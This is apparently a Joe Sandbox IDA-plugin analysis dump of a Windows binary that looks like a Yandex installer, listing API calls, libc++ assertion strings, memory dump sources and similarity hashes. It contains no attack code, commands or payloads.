                                                                                                                        Similarity
                                                                                                                        • API ID: Init_thread_header
                                                                                                                        • String ID: Friday$Monday$Sunday$Tuesday$rday
                                                                                                                        • API String ID: 3738618077-4029317968
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32 ref: 00858EA4
                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00858EBA
                                                                                                                        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,-00000001,?), ref: 00858F0B
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00858FA4
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\vector:1393: assertion __n < size() failed: vector[] index out of bounds, xrefs: 00858FCD
                                                                                                                        • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00858FBE
                                                                                                                        • ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at, xrefs: 00858FDC
                                                                                                                        Similarity
                                                                                                                        • API ID: File$CloseCreateHandleReadSize
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at$..\..\third_party\libc++\src\include\vector:1393: assertion __n < size() failed: vector[] index out of bounds
                                                                                                                        • API String ID: 3919263394-2095639689
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0089E270: GetFileAttributesW.KERNEL32(?,?,00000000), ref: 0089E2CD
                                                                                                                        • GetLastError.KERNEL32 ref: 008C4465
                                                                                                                        • GetLastError.KERNEL32 ref: 008C4469
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$AttributesFile
                                                                                                                        • String ID: filepath=$Failed to CryptMsgGetAndVerifySigner, gle=$Failed to CryptQueryObject, gle=$VerifyFileSigner
                                                                                                                        • API String ID: 2642427456-589752536
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(Software\Yandex,00000002,80000001), ref: 0092E153
                                                                                                                        • GetLastError.KERNEL32(?,00000001), ref: 0092E20D
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast
                                                                                                                        • String ID: ' at '$Can't create registry value '$Can't open registry key: $RememberUidIsCreated$Software\AppDataLow\Yandex$Software\Yandex
                                                                                                                        • API String ID: 1452528299-3805467497
                                                                                                                        APIs
                                                                                                                        Similarity
                                                                                                                        • API ID: _strrchr
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3213747228-0
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 008FCBB7
                                                                                                                        • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 008FCB73
                                                                                                                        • string_view::substr, xrefs: 008FCB9E
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 008FCBA8
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:533: assertion __s.size() == 0 || __s.data() != nullptr failed: string_view::find_first_of(): received nullptr, xrefs: 008FCB82
                                                                                                                        Similarity
                                                                                                                        • API ID: _strlen
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$..\..\third_party\libc++\src\include\string_view:533: assertion __s.size() == 0 || __s.data() != nullptr failed: string_view::find_first_of(): received nullptr$string_view::substr
                                                                                                                        • API String ID: 4218353326-3166779238
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 008E1086
                                                                                                                        • ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 008E108D
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 008E1094
                                                                                                                        • installer_type, xrefs: 008E0EA8, 008E0F10, 008E0F58, 008E0F5F, 008E0F73, 008E0FC7, 008E0FCE, 008E0FE2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _strlen
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$installer_type
                                                                                                                        • API String ID: 4218353326-1463633511
                                                                                                                        APIs
                                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(009714A8,?,?,?,?,?,?,?,?,?,?,008AE91D,1207E8D8,?,008AE531), ref: 008DA36C
                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(009714A8,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008DA3B9
                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(009714A8,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008DA479
                                                                                                                        • __Init_thread_header.LIBCMT ref: 008DA500
                                                                                                                          • Part of subcall function 008FFBA7: EnterCriticalSection.KERNEL32(00963AB4,?,?,?,008C892C,0097139C,00000000,?,?,?,?,008C86AD,00000000,00000000), ref: 008FFBB2
                                                                                                                          • Part of subcall function 008FFBA7: LeaveCriticalSection.KERNEL32(00963AB4,?,?,?,008C892C,0097139C,00000000,?,?,?,?,008C86AD,00000000,00000000), ref: 008FFBEF
                                                                                                                        • __Init_thread_header.LIBCMT ref: 008DA536
                                                                                                                        Strings
                                                                                                                        • Stability.DumpWithoutCrashingStatus, xrefs: 008DA3EF
                                                                                                                        Similarity
                                                                                                                        • API ID: ExclusiveLock$CriticalInit_thread_headerReleaseSection$AcquireEnterLeave
                                                                                                                        • String ID: Stability.DumpWithoutCrashingStatus
                                                                                                                        • API String ID: 3781742723-453052744
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 008B0836
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 008B082F
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:267: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length, xrefs: 008B083D
                                                                                                                        Similarity
                                                                                                                        • API ID: _strlen
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\string_view:267: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length$..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr
                                                                                                                        • API String ID: 4218353326-4247613780
                                                                                                                        APIs
                                                                                                                        • SetEvent.KERNEL32(?), ref: 00840202
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,0000EA60), ref: 00840213
                                                                                                                        • GetLastError.KERNEL32 ref: 00840220
                                                                                                                        • TerminateThread.KERNEL32(00000000,00000000,Failed to wait for install async exit. Terminate install_thread_,00942CFB,00000001,~Installer,000001F4,?), ref: 00840280
                                                                                                                        Strings
                                                                                                                        • ~Installer, xrefs: 00840240
                                                                                                                        • Failed to wait for install async exit. Terminate install_thread_, xrefs: 00840255
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorEventLastObjectSingleTerminateThreadWait
                                                                                                                        • String ID: Failed to wait for install async exit. Terminate install_thread_$~Installer
                                                                                                                        • API String ID: 2510535927-3230243165
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesW.KERNEL32(?,?,00000000), ref: 0089E362
                                                                                                                        • CreateFileW.KERNEL32(?,0089EFEC,00000007,00000000,00000003,02000000,00000000), ref: 0089E393
                                                                                                                        • GetLastError.KERNEL32 ref: 0089E39F
                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 0089E3B4
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFileLast$AttributesCreate
                                                                                                                        • String ID: PathHasAccess$file_util_win.cc
                                                                                                                        • API String ID: 1299224125-729966965
                                                                                                                        APIs
                                                                                                                        • InitOnceExecuteOnce.KERNEL32(00972A68,008F0610,?,00000000,00000000,008F0440,?,?,00000130), ref: 008F07A9
                                                                                                                        • GetLastError.KERNEL32(?,?,00000130), ref: 008F07C7
                                                                                                                        • TlsGetValue.KERNEL32(?,?,00000130), ref: 008F07D5
                                                                                                                        • SetLastError.KERNEL32(00000000,?,?,00000130), ref: 008F07DE
                                                                                                                        • TlsSetValue.KERNEL32(00000000,?,?,?,?,?,?,00000130), ref: 008F0801
                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(00972A74,?,?,00000130), ref: 008F0814
                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(00972A74,?,?,00000130), ref: 008F0825
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorExclusiveLastLockOnceValue$AcquireExecuteInitRelease
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 389898287-0
                                                                                                                        APIs
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,0091EC86,?,00000022,00000000,?,?,?,0091E7BF,00000022,FlsSetValue,00936768,FlsSetValue,?), ref: 0091EC38
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeLibrary
                                                                                                                        • String ID: api-ms-$ext-ms-
                                                                                                                        • API String ID: 3664257935-537541572
                                                                                                                        APIs
                                                                                                                        • __Init_thread_header.LIBCMT ref: 008CE2D9
                                                                                                                          • Part of subcall function 008FFBA7: EnterCriticalSection.KERNEL32(00963AB4,?,?,?,008C892C,0097139C,00000000,?,?,?,?,008C86AD,00000000,00000000), ref: 008FFBB2
                                                                                                                          • Part of subcall function 008FFBA7: LeaveCriticalSection.KERNEL32(00963AB4,?,?,?,008C892C,0097139C,00000000,?,?,?,?,008C86AD,00000000,00000000), ref: 008FFBEF
                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,008A048D), ref: 008CE2FB
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 008CE307
                                                                                                                        • GetCurrentProcess.KERNEL32(?,?,008A048D), ref: 008CE31C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$AddressCurrentEnterHandleInit_thread_headerLeaveModuleProcProcess
                                                                                                                        • String ID: GetProcessMitigationPolicy$kernel32.dll
                                                                                                                        • API String ID: 835113086-1680159014
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0090071E,00900926), ref: 009006BA
                                                                                                                        • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 009006D0
                                                                                                                        • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 009006E5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                        • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                        • API String ID: 667068680-1718035505
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 0595F76F
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0595F77A
                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0595F7E8
                                                                                                                          • Part of subcall function 0595F8CB: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0595F8E3
                                                                                                                        • std::locale::_Setgloballocale.LIBCPMT ref: 0595F795
                                                                                                                        • _Yarn.LIBCPMT ref: 0595F7AB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                        • String ID: VD
                                                                                                                        • API String ID: 1088826258-1791571226
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(user32.dll,?,?,?,?,E8E931F0,000B54B8,?,?,?,?,00000000,00000006,?lang=,0010C25D,FFFFFFBA), ref: 0085A54E
                                                                                                                        • GetProcAddress.KERNEL32(00000000,ChangeWindowMessageFilterEx), ref: 0085A590
                                                                                                                          • Part of subcall function 008F92F0: __Init_thread_header.LIBCMT ref: 008F9346
                                                                                                                          • Part of subcall function 008F92F0: GetVersionExW.KERNEL32(?), ref: 008F937C
                                                                                                                          • Part of subcall function 008F92F0: GetProductInfo.KERNEL32(?,?,00000000,00000000,?), ref: 008F9393
                                                                                                                          • Part of subcall function 008F92F0: __Init_thread_header.LIBCMT ref: 008F93EF
                                                                                                                          • Part of subcall function 008F92F0: GetNativeSystemInfo.KERNEL32(0096599C), ref: 008F9420
                                                                                                                        • GetProcAddress.KERNEL32(00000000,ChangeWindowMessageFilter), ref: 0085A574
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressInfoInit_thread_headerProc$HandleModuleNativeProductSystemVersion
                                                                                                                        • String ID: ChangeWindowMessageFilter$ChangeWindowMessageFilterEx$user32.dll
                                                                                                                        • API String ID: 39747407-1782194287
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(0000000B,?), ref: 0093078B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast
                                                                                                                        • String ID: CreateFileVersionInfo error$GetCrypt32DllVersion$ScopedAllowBlockingForInstallUtil$crypt32.dll$yandex_trust_verifier_win.cc
                                                                                                                        • API String ID: 1452528299-962809236
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(?,00000001,0091C0E2,00901D94,00000011), ref: 0091C0F9
                                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0091C107
                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0091C120
                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 0091C172
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3852720340-0
                                                                                                                        • Opcode ID: 01fdd240f3b16317a4c9951b5fae7cdbf946e55f8f2563509fb84937e0e74605
                                                                                                                        • Instruction ID: 1f491e77228261ae2ff0e07fb5982569fce0d039b9d64496700dd4d1894e827f
                                                                                                                        • Opcode Fuzzy Hash: 01fdd240f3b16317a4c9951b5fae7cdbf946e55f8f2563509fb84937e0e74605
                                                                                                                        • Instruction Fuzzy Hash: 4D01F1723AD3256FAA212BB8BCC59AB2649EB817B9F300229F215950F6EF914C817140
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesW.KERNEL32(?,?,00000000,?,?,SystemTemp,0000000A,?,00000000), ref: 0089EDBC
                                                                                                                        Strings
                                                                                                                        • CreateTemporaryDirInDir, xrefs: 0089E991
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 0089EC7C
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 0089EC83
                                                                                                                        • file_util_win.cc, xrefs: 0089E98C
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesFile
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$CreateTemporaryDirInDir$file_util_win.cc
                                                                                                                        • API String ID: 3188754299-1011401140
                                                                                                                        • Opcode ID: 4b742a19777931d833fd83e1a72ca4b3929bab19e58558ef5804fb9fc66dc778
                                                                                                                        • Instruction ID: a3fdcd81b9701c9ff7709a963dfc3ce1598895e45b259d1cb6979321a4d98c17
                                                                                                                        • Opcode Fuzzy Hash: 4b742a19777931d833fd83e1a72ca4b3929bab19e58558ef5804fb9fc66dc778
                                                                                                                        • Instruction Fuzzy Hash: C4A1B2716083519BDB11EF24C881A6BBBE4FFD5718F08492DF5C5E3292DB20EA488793
                                                                                                                        APIs
                                                                                                                        • GetEnvironmentVariableW.KERNEL32(00000000,?,00000104,?,?,?,?,00944D18,..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type), ref: 0085CE00
                                                                                                                        • __Init_thread_header.LIBCMT ref: 0085CF54
                                                                                                                          • Part of subcall function 008FFBA7: EnterCriticalSection.KERNEL32(00963AB4,?,?,?,008C892C,0097139C,00000000,?,?,?,?,008C86AD,00000000,00000000), ref: 008FFBB2
                                                                                                                          • Part of subcall function 008FFBA7: LeaveCriticalSection.KERNEL32(00963AB4,?,?,?,008C892C,0097139C,00000000,?,?,?,?,008C86AD,00000000,00000000), ref: 008FFBEF
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 0085CF39
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 0085CF40
                                                                                                                        • Application, xrefs: 0085CEC9, 0085CECE, 0085CEE0
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$EnterEnvironmentInit_thread_headerLeaveVariable
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$Application
                                                                                                                        • API String ID: 3061280413-3660936432
                                                                                                                        • Opcode ID: c965d2a2462104fc25f3711014d956309d9b8ebc27e4855b870021041866e66c
                                                                                                                        • Instruction ID: c6d490893663a9ea3cc0a815c89d6d8128119791b1c510c29c8a5e7ce05e4df2
                                                                                                                        • Opcode Fuzzy Hash: c965d2a2462104fc25f3711014d956309d9b8ebc27e4855b870021041866e66c
                                                                                                                        • Instruction Fuzzy Hash: 7871D670A003156FDB20AF58DC86ABEB7B5FF95705F444468EC09E7242DB70AE49CE92
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 008F02D0: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000,?,?,?,-00000001,?,008F00C5,008CE3DD,?,-00000001,?,008CE3DD,CR_SOURCE_ROOT,0000000E), ref: 008F0303
                                                                                                                          • Part of subcall function 008F02D0: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,-00000001), ref: 008F0362
                                                                                                                        • SetEnvironmentVariableW.KERNEL32(?,?), ref: 008F01F7
